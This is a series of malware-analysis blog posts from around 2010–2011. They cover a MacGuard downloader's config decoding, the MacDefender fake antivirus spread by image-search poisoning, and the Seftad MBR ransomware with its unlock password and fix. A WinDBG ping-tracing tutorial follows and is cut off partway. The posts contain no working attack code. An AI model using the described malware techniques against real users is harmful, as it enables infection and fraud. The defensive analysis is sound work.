<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbjk3wH900oMAxVTOJAzMNRUhQOHCyBgImz1n2F1AjCzPj7O0a4ehCe_p1cmwFUnOJbr2i2yqJaMkgtQfxM_0ZYz2sMTH6auVfLGAUpY5QVfh6tHP-Wp0lR_tP7AtFZBg5y6bYQxbYCgvm/s1600/Figure6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbjk3wH900oMAxVTOJAzMNRUhQOHCyBgImz1n2F1AjCzPj7O0a4ehCe_p1cmwFUnOJbr2i2yqJaMkgtQfxM_0ZYz2sMTH6auVfLGAUpY5QVfh6tHP-Wp0lR_tP7AtFZBg5y6bYQxbYCgvm/s1600/Figure6.png" /></span></a></div></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 6: Downloader’s Configuration File Reading<o:p></o:p></span></u><br />
<u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilz2QQ1o4JWz396EiYxgZeYB9uU5xz0KDBw3-q-HDul8bSdPm2PVC_jRjkUaQ_ISqWKierA8v77eLyudlV_FDeRcoHInF8lNlisSSDcumMLPJLtJrhChyANfbPLZqusSpX0kIXKYNj1Qmh/s1600/Figure7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilz2QQ1o4JWz396EiYxgZeYB9uU5xz0KDBw3-q-HDul8bSdPm2PVC_jRjkUaQ_ISqWKierA8v77eLyudlV_FDeRcoHInF8lNlisSSDcumMLPJLtJrhChyANfbPLZqusSpX0kIXKYNj1Qmh/s1600/Figure7.png" /></span></a></div></div><div align="center" class="MsoNormal" style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><u></u><u><o:p></o:p></u></span></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 7: avRunner Package Contents<o:p></o:p></span></u></div><div align="center" class="MsoNormal" style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Basically, from Figure 6 second part, it attempts to read the last byte of the picture file which is <b style="mso-bidi-font-weight: normal;">27h</b> that is the starting offset where the encoded data is located. After that, it reads <b style="mso-bidi-font-weight: normal;">27h </b>bytes encoded data and decode it using simple decoding method. The decoding configuration data can be seen in the highlighted image in Figure 8.<o:p></o:p></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<ol start="4"><li><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Decoding and retrieving the URL's variables</span></b></li>
</ol><div><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></b></div><ol start="4"><b><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"> </span></b></ol></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">This configuration data will be separated by the delimiter <b style="mso-bidi-font-weight: normal;">“;”</b>. In short the configuration data can be represented as following:<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Index 0 => Installer’s file name<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Index 1 => First remote server ip address<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Index 2 </span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">=></span><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"> Second remote server ip address</span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Index 3 => Affiliates ID <o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">For example, the caller function can pass argument 0 to get the installer’s file name and so forth.<o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><o:p></o:p></span></div><div class="MsoNormal"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzmaiXyz4anBgY1C_dmlpZky5ZIdhkljUAT9GkF0xBJeCwV-xHnuS-bHW_GMIjAxorfDmmNe-mccC4FELXJS5Jajs5ZnGHMAFITVWGT952FUosZBH9JHKxVNMeki9oEIqL2FxX3rOCLhgH/s1600/Figure8.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzmaiXyz4anBgY1C_dmlpZky5ZIdhkljUAT9GkF0xBJeCwV-xHnuS-bHW_GMIjAxorfDmmNe-mccC4FELXJS5Jajs5ZnGHMAFITVWGT952FUosZBH9JHKxVNMeki9oEIqL2FxX3rOCLhgH/s1600/Figure8.png" /></span></a></div></div><div align="center" class="MsoNormal" style="text-align: center;"><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Figure 8: Decoding DownloadPict Configuration File<o:p></o:p></span></u></div><div align="center" class="MsoNormal" style="text-align: center;"><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></div><div class="MsoNormal"><div class="separator" style="clear: both; text-align: center;"></div><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">After the download is completed, <b>MacGuard </b>will be launched automatically. The downloaded ZIP archive file will be removed from the local drive.<a href="http://www.blogger.com/post-edit.g?blogID=1022731470813881575&postID=6020552948196171268" name="_GoBack"></a><o:p></o:p></span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span><br />
<b><i><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Register your copy of MacGuard</span></u></i></b><br />
<b><i><u><span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;"><br />
</span></u></i></b><br />
<span class="Apple-style-span" style="font-family: Arial, Helvetica, sans-serif;">Kaspersky Lab has published a second part of <a href="http://www.securelist.com/en/blog/208188067/Mac_Protector_Register_your_copy_now_Part_2">Mac Protector: Register your copy now!</a> Not surprisingly, in the latest variant, it uses the similar string retrieval method as described in <b>Decoding and retrieving the URL's variables</b>.</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span></div>x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-13503359666894516192011-05-15T15:28:00.002+08:002011-05-15T15:31:51.268+08:00[NEWS] Mac OSX First Ever Fake AntivirusThe first fake antivirus has been released on Mac OS X recently which is called MacDefender/MacProtector/MacSecurity.<br />
<br />
I had a chance to come across this fake av when I did google image search a few days back. Unsurprisingly, this Mac fake av does exactly the same way as what Windows fake av did that is it also presents a fake browser page showing the user that their machine has been infected with malware.<br />
<br />
When I did a google image search, I opened an image indexed by google in which google will redirect me to a compromised website with a "hidden" (from novice computer user point of view) javascript. After the compromised page is opened, it will immediately redirect user to another page with URL top level domain <b>"cz.cc"</b> which is where the fake av page will be displayed.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img820.imageshack.us/img820/6196/picture1gpz.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="http://img820.imageshack.us/img820/6196/picture1gpz.png" width="320" /></a></div><div style="text-align: center;"><u>Figure 1: Image Indexed by Google</u></div><div style="text-align: center;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEhFTcpYHigO_JTUW3ermaKiaxmAAwoynhLx4HYWksMiJppN5Aslg0Wcm7NIJ3C0JD4SnU_ZBbA5VvHxd8L4lHEr7i0gAQ8dTzaoUt244IAEfsYBST1GohtEzB-__oebw02kJXGrGwHeKG/s1600/Picture+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEhFTcpYHigO_JTUW3ermaKiaxmAAwoynhLx4HYWksMiJppN5Aslg0Wcm7NIJ3C0JD4SnU_ZBbA5VvHxd8L4lHEr7i0gAQ8dTzaoUt244IAEfsYBST1GohtEzB-__oebw02kJXGrGwHeKG/s320/Picture+2.png" width="320" /></a></div><div style="text-align: center;"><u><br />
</u></div><div style="text-align: center;"><u>Figure 2: Script Redirection From Compromised Site</u></div><div style="text-align: center;"><u><br />
</u></div><div style="text-align: center;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT08dfGmyXh06QE_WSMozmIjqh3_pOYhtJZfX06MRiKz0CJLiFmbKuZuaVHOza4gl-n50hQ4FJ_ObuxIDA0YmygXYEQqHlSKhRvRHYUucR4txu95fsLC_ufkTyeAvCADjNcke7RrznE_X1/s1600/Picture+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhT08dfGmyXh06QE_WSMozmIjqh3_pOYhtJZfX06MRiKz0CJLiFmbKuZuaVHOza4gl-n50hQ4FJ_ObuxIDA0YmygXYEQqHlSKhRvRHYUucR4txu95fsLC_ufkTyeAvCADjNcke7RrznE_X1/s320/Picture+3.png" width="320" /></a></div><div style="text-align: center;"><u>Figure 3: Fake AV Scan Result</u></div><div style="text-align: center;"><u><br />
</u></div><div style="text-align: left;">Immediately after the scan finished, it will prompt a dialog box to ask download and execute the file after user clicked <b>"Remove all" </b>button.</div><div style="text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWCtRqmvq6WSQOpSYYrSHJc3xGzPLjrFV53ODyZuXFtiZoLX8Y7nqBJoHDd8JXplGJsLJW85u9f1Xlc-CdLa4n_0B7u0zyRVaJGe9kAH2p1sphVaMKXjKrPbfthtdprHJQoNDtWGU_BRse/s1600/Picture+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWCtRqmvq6WSQOpSYYrSHJc3xGzPLjrFV53ODyZuXFtiZoLX8Y7nqBJoHDd8JXplGJsLJW85u9f1Xlc-CdLa4n_0B7u0zyRVaJGe9kAH2p1sphVaMKXjKrPbfthtdprHJQoNDtWGU_BRse/s320/Picture+4.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><u>Figure 4: Download Fake AV File</u></div><div class="separator" style="clear: both; text-align: center;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: left;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: left;">If you are interested a get a registered version of this MacSecurity, you can visit this post from Kaspersky Lab, <a href="http://www.securelist.com/en/blog/11252/Mac_Protector_Register_your_copy_now">http://www.securelist.com/en/blog/11252/Mac_Protector_Register_your_copy_now</a> where you can get a list of valid license key!</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5oGF5F2iMcaZFgN5JkQRM9DM2REGODISo-lhscjbvhvl18gx-oDHrxaPDrO9zr8TOA3pdSNgOKnt3X10aLEHAU5FtktVH-1gFM9KAuwzthbWGEuo1QHgZKmipMnaiZ03EqueTop41YbPZ/s1600/Mac+OS+X+10.6-2011-05-15-15-22-04.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg5oGF5F2iMcaZFgN5JkQRM9DM2REGODISo-lhscjbvhvl18gx-oDHrxaPDrO9zr8TOA3pdSNgOKnt3X10aLEHAU5FtktVH-1gFM9KAuwzthbWGEuo1QHgZKmipMnaiZ03EqueTop41YbPZ/s320/Mac+OS+X+10.6-2011-05-15-15-22-04.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><u>Figure 5: Fake AV Scanning in Action</u></div><div class="separator" style="clear: both; text-align: center;"><u><br />
</u></div><div class="separator" style="clear: both; text-align: left;">Now I have a registered MacProtector to clean the "detected" file =)</div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitsEB0KlxKitkhyphenhyphen3AwwQOd6cyxrWqtqAvKYUvszmkMjVIUGBYRiqXwyeeitCXNy4_nLAaOBlWdCyiP5ShrOjNA_ud84wPvNs9anAY3bbS06E1L-Qw0SrDyALMlzkNolGvO0djdzSvNzpIr/s1600/Mac+OS+X+10.6-2011-05-15-15-21-38.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="272" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEitsEB0KlxKitkhyphenhyphen3AwwQOd6cyxrWqtqAvKYUvszmkMjVIUGBYRiqXwyeeitCXNy4_nLAaOBlWdCyiP5ShrOjNA_ud84wPvNs9anAY3bbS06E1L-Qw0SrDyALMlzkNolGvO0djdzSvNzpIr/s320/Mac+OS+X+10.6-2011-05-15-15-21-38.png" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"><u>Figure 6: Registered Copy of MacProtector</u></div><div class="separator" style="clear: both; text-align: left;"><br />
</div><div style="text-align: left;"><span class="Apple-style-span" style="font-size: large;"><b>Reference</b></span><br />
<span class="Apple-style-span" style="font-size: large;"><b><br />
</b></span><br />
You can visit <a href="http://blog.unmaskparasites.com/2011/05/05/thousands-of-hacked-sites-seriously-poison-google-image-search-results/">http://blog.unmaskparasites.com/2011/05/05/thousands-of-hacked-sites-seriously-poison-google-image-search-results/</a> for the excellent research on google image SEO poisoning technical information.<br />
<br />
Have fun!<br />
<br />
</div>Signing off @x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com1tag:blogger.com,1999:blog-1022731470813881575.post-45629487883729520202010-12-04T16:53:00.002+08:002010-12-14T00:23:27.441+08:00My PC Was Stoned by Ransom Seftad<div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2d7880pD7f2e0gRaG1vz_SSyuQRjIEqXcH4MvTun641uMU24EEyVx2oDaqLZVayJjYOwcNQGVso1m3VOc1lTl6s053nq0naV_cSqTnKkiSCIHnRUy-V0qXdoD81R8sgiAEr_5D-PFByvN/s1600/Clone+of+Analyst+-+WXP+SP2-2010-12-04-16-14-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2d7880pD7f2e0gRaG1vz_SSyuQRjIEqXcH4MvTun641uMU24EEyVx2oDaqLZVayJjYOwcNQGVso1m3VOc1lTl6s053nq0naV_cSqTnKkiSCIHnRUy-V0qXdoD81R8sgiAEr_5D-PFByvN/s1600/Clone+of+Analyst+-+WXP+SP2-2010-12-04-16-14-54.png" /></a></div><br />
<br />
If you are so unlucky to be one of the victims of Seftad MBR ransomware, do not worry, this MBR infector does not work as what it claims. That is it does not encrypt you hard drive at all but it merely infects your hard disk drive MBR:<br />
<br />
<u>Original Clean MBR</u><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkFWAZYJPai-XSehGHSqpzuIENkcgsCH5sL-7D5BZXC1cD0gwXo5u6tWeyx3VSIygZA-o8_fgzV8fFkimd5W5yuuAh_65KCwNM-xqcFZQSSny2UJvSU5tYcioHBaDdaIhxxjwO_SErUuyC/s1600/orig_clean_mbr.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkFWAZYJPai-XSehGHSqpzuIENkcgsCH5sL-7D5BZXC1cD0gwXo5u6tWeyx3VSIygZA-o8_fgzV8fFkimd5W5yuuAh_65KCwNM-xqcFZQSSny2UJvSU5tYcioHBaDdaIhxxjwO_SErUuyC/s640/orig_clean_mbr.png" width="464" /></a></div><br />
<br />
<u>Seftad infected MBR</u><br />
<u><br />
</u><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7fCAi_A_AZK60xi9Hojn3pClWkgHgk1OA5UIptRzdvG1zl7DWLDL4EuMIAuved5sDdoDzxmQB40-PQ1Gkl5mt6pYQsTxhWyNsHKqG4dFP9k6Lq2XwNb-IRieVECr4_JljoiJx-Ce2UMe6/s1600/infected_mbr_part1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi7fCAi_A_AZK60xi9Hojn3pClWkgHgk1OA5UIptRzdvG1zl7DWLDL4EuMIAuved5sDdoDzxmQB40-PQ1Gkl5mt6pYQsTxhWyNsHKqG4dFP9k6Lq2XwNb-IRieVECr4_JljoiJx-Ce2UMe6/s640/infected_mbr_part1.png" width="467" /></a></div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwqlwqc9s8-h2wpYU1W2S1fozLw7qGFaUQF-VnN2IV-OP0HsczKOs-Zb_s9DwkT7yj17Dnb6pR8Ox0gDxf1vyVO6a50CUAtlwscL9Wy90X0IvN-E8HeShpP_lBgsAxiHFJWnRwaRcrObUW/s1600/infected_mbr_part2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwqlwqc9s8-h2wpYU1W2S1fozLw7qGFaUQF-VnN2IV-OP0HsczKOs-Zb_s9DwkT7yj17Dnb6pR8Ox0gDxf1vyVO6a50CUAtlwscL9Wy90X0IvN-E8HeShpP_lBgsAxiHFJWnRwaRcrObUW/s640/infected_mbr_part2.png" width="577" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT2DHfku6pkc7BAZN0SeVFdGZzcZekhDwbjIyca2THHhNg4UbOQ_fMlvWAthvwU-6l_-4ESbOrj-_ULJa2CQqCXiOPMRYbDhyYph6M8nXUvNYr7KPZbG3M4FPU-ID-zB15eA8C96fngiqf/s1600/infected_mbr_part3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiT2DHfku6pkc7BAZN0SeVFdGZzcZekhDwbjIyca2THHhNg4UbOQ_fMlvWAthvwU-6l_-4ESbOrj-_ULJa2CQqCXiOPMRYbDhyYph6M8nXUvNYr7KPZbG3M4FPU-ID-zB15eA8C96fngiqf/s640/infected_mbr_part3.png" width="576" /></a></div><br />
Basically, it replaces the original MBR with the malicious one that is 3 sectors length. The original MBR will be stored at the 4th sector which is offset <b>0x800</b>. <br />
<br />
The password that user entered will be calculated as a word hash value and it can be found here:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFCBYFptWmuxUsmjlHay-Yjlu1Y0AJ175FpYkQZBV-S0K6_CEFu8vsmxrh8HmDXGhpfIoBCk2GCJ1X834Y9Mf7gF03-MlOj-eX_ZmxW8XzDHJHFSS4nEpDXTyj04qpBLTxkN-nUYBsxhLl/s1600/mbr_seftad.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="252" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFCBYFptWmuxUsmjlHay-Yjlu1Y0AJ175FpYkQZBV-S0K6_CEFu8vsmxrh8HmDXGhpfIoBCk2GCJ1X834Y9Mf7gF03-MlOj-eX_ZmxW8XzDHJHFSS4nEpDXTyj04qpBLTxkN-nUYBsxhLl/s640/mbr_seftad.PNG" width="640" /></a></div><br />
The address <b>7FFA </b>refers to the real-mode address in boot sector and the password is actually located at offset <b>0x5FA</b>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2IlRtznuTFWSiQc9F0y0j2fmg1ilVPCjsIE2c_yhVUo1aaxlrPBxXCjEgD-EXuhcTVw0RARNlFVinHAFdLpOX_q69Fq3cdBXJgLZFICnwW8ztwt7GnG1K3rQQ4ljPZ28yyUz3rmrEfsFT/s1600/password.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="218" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2IlRtznuTFWSiQc9F0y0j2fmg1ilVPCjsIE2c_yhVUo1aaxlrPBxXCjEgD-EXuhcTVw0RARNlFVinHAFdLpOX_q69Fq3cdBXJgLZFICnwW8ztwt7GnG1K3rQQ4ljPZ28yyUz3rmrEfsFT/s640/password.png" width="640" /></a></div><br />
<br />
which is <b>0x3c01.</b><br />
<br />
Nevertheless, this MBR infection can be easily solved by using Windows Recovery Console > 'Fixmbr'.<br />
<br />
Signing off @x9090x9090http://www.blogger.com/profile/07253863514381068976noreply@blogger.com2tag:blogger.com,1999:blog-1022731470813881575.post-28078140172956412052010-12-03T01:15:00.000+08:002010-12-03T01:15:34.971+08:00[DOC] Understanding Packets Flow from User Mode to Kernel ModeIt can be determined by first triggering <b>ping</b> and observes how it initiates a packet and send it through to the Network Interface Card (NIC)<br />
<br />
<br />
<div style="color: blue;"><span style="font-size: x-large;">Initiate PING</span></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU03aq9FOC7ohi9WnBdU7I9dIbzrq5qt12IfULvVfMUrP2jw_yr5rMlgsj3Sx8a_3BLepmqb9ik_AFA2ofXGZkATdVde8TMynWtl3UEcn1uiNeEbi6oEIQ5RIM1msnd6vdDDBqhpVzro9_/s1600/icmpsendecho2ex.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br />
</a></div><ul><li><span style="font-size: large;"> </span>When <b>ping </b>is initiated, it will call function <b>IcmpSendEcho2Ex</b> exported by <b>IPHLPAPI.dll </b>to send ICMP packets (NOTE: Assume <b>ping </b>is run from Windows Vista or above, for Windows XP <b>IcmpSendEcho2 </b>will be used instead)</li>
</ul><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU03aq9FOC7ohi9WnBdU7I9dIbzrq5qt12IfULvVfMUrP2jw_yr5rMlgsj3Sx8a_3BLepmqb9ik_AFA2ofXGZkATdVde8TMynWtl3UEcn1uiNeEbi6oEIQ5RIM1msnd6vdDDBqhpVzro9_/s1600/icmpsendecho2ex.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="255" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiU03aq9FOC7ohi9WnBdU7I9dIbzrq5qt12IfULvVfMUrP2jw_yr5rMlgsj3Sx8a_3BLepmqb9ik_AFA2ofXGZkATdVde8TMynWtl3UEcn1uiNeEbi6oEIQ5RIM1msnd6vdDDBqhpVzro9_/s320/icmpsendecho2ex.png" width="320" /></a></div><br />
<ul><li>At the same time, WinDBG should be connected and find the <b>ping</b> process context:</li>
</ul><blockquote><span style="color: yellow; font-size: x-small;"><span style="font-family: "Courier New",Courier,monospace;">kd> !process ping.exe</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PROCESS 80551d80 SessionId: none Cid: 0000 Peb: 00000000 ParentCid: 0000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DirBase: 0032f000 ObjectTable: e1000c68 HandleCount: 180.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Image: Idle</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> VadRoot 00000000 Vads 0 Clone 0 Private 0. Modified 0. Locked 0.</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> DeviceMap 00000000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Token e1001790</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> ElapsedTime 00:00:00.000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> UserTime 00:00:00.000</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> KernelTime 01:50:48.562</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> QuotaPoolUsage[PagedPool] 0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> QuotaPoolUsage[NonPagedPool] 0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> Working Set Sizes (now,min,max) (7, 50, 450) (28KB, 200KB, 1800KB)</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PeakWorkingSetSize 0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> VirtualSize 0 Mb</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PeakVirtualSize 0 Mb</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> PageFaultCount 0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> MemoryPriority BACKGROUND</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> BasePriority 0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> CommitCharge 0</span><br style="font-family: "Courier New",Courier,monospace;" /><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> THREAD 80551b20 Cid 0000.0000 Teb: 00000000 Win32Thread: 00000000 RUNNING on processor 0</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> .process /r /p 80551d80</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> *** ERROR: Symbol file could not be found. Defaulted to export symbols for iphlpapi.dll - </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> </span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> kd> lm m iphlpapi</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> start end module name</span><br style="font-family: "Courier New",Courier,monospace;" /><span style="font-family: "Courier New",Courier,monospace;"> 76d60000 76d79000 iphlpapi (export symbols) iphlpapi.dll</span></span> </blockquote><ul><li>Set a breakpoint at<b> iphlpapi!IcmpSendEcho2</b> and find the address before this API call:</li>
</ul><blockquote><span style="font-size: x-small;"><span style="color: yellow; font-family: "Courier New",Courier,monospace;">kd> kb</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> ChildEBP RetAddr Args to Child </span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> WARNING: Stack unwind information not available. Following frames may be wrong.</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007f9f8 0100237b 0000074c 00000000 00000000 iphlpapi!IcmpSendEcho2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007ff44 010029eb 00000003 00034020 00032a98 ping!main+0x9b2</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; font-family: "Courier New",Courier,monospace;"> 0007ffc0 7c816fd7 00000010 00000000 7ffd4000 ping!mainCRTStartup+0x125</span><br style="color: yellow; font-family: "Courier New",Courier,monospace;" /><span style="color: yellow; 